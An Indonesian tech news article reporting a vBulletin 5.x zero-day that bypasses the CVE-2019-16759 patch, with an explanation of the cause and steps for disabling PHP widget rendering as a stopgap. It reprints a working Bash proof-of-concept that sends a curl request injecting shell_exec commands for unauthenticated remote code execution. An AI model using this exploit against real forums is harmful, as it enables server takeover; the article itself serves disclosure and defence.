TeknoCerdas.com – Salam cerdas untuk kita semua. Dilansir dari ZDNet eksploit kode vBulletin zero-day kembali ditemukan. Eksploit zero-day ini dapat melakukan bypass terhadap patch yang telah dikeluarkan untuk CVE-2019-16759.
CVE-2019-16759 sendiri adalah patch yang dikeluarkan untuk mengatasi celah keamanan pada sistem template vBulletin. Dimana seorang attacker dapat menyisipkan dan menjalakan kode eksploit pada vBulletin tanpa perlu otentikasi. Ini adalah tipe celah keamanan remote code execution.
Versi vBulletin yang terkena dampak dari CVE-2019-16759 adalah vBulletin versi 5.0.0 sampai 5.5.4.
Peneliti keamanan Amir Etemadieh dalam blog pribadinya mendemonstrasikan proof-of-concept (PoC) bagaimana celah keamanan ini bisa dieksploitasi. Dalam tulisannya tersebut Amir menemukan masalah kenapa patch CVE-2019-16759 dapat dilewati.
Dua hal yang menjadi sumber masalah adalah:
- Kemampuan sebuah template untuk menampilkan child template yang dapat didefinisikan oleh pengguna.
- Saat menampilkan child template tersebut nilai dari child template tersebut dimasukkan dalam sebuah variabel
widgetConfig
.
Karena dua hal diatas maka CVE-2019-16759 dapat dilewati. Kode PoC dari celah keamanan ini juga ditunjukkan oleh Amir. Berikut adalah PoC yang ditulis dalam Bash.
#!/bin/bash
#
# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex
#
# Usage ./exploit
# Urlencode cmd
CMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'`
# Send request
curl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("'+$CMD+'");exit;'
Tidak lama setelah kode zero-day diumumkan ke publik untuk celah keamanan ini, maka banyak yang komunitas hacking yang mencoba celah ini. Berikut adalah salah satu contohnya.
Solusi Eksploit Kode vBulletin Zero-Day
Saat ini vBulletin belum mengeluarkan patch resmi terhadap celah keamanan terbaru ini. Dikutip dari blog Amir Etemadieh pemilik forum vBulletin dapat menonaktifkan PHP widget sebagai solusi jangka pendek. Langkah-langkah yang harus dilakukan adalah.
- Masuk pada vBulletin adminstrator control panel
- Klik menu “Settings” kemudian “Options” pada dropdown
- Pilih “General Settings” dan klik “Edit Settings”
- Cari pilihan “Disable PHP, Static HTML, and Ad Module rendering” dan set ke “Yes”
- Simpan perubahan
vBulletin adalah salah satu software forum terpopuler. Berdasarkan data dari W3Tech, vBulletin digunakan oleh 0.1% dari semua website. vBulletin versi 5 sendiri digunakan sebanyak 9% dari total instalasi vBulletin yang disurvey oleh W3Tech.
Melihat data statistik diatas para pemilik forum harus segera melakukan langkah diatas guna mencegah instalasi vBulletin mereka menjadi target dari serangan.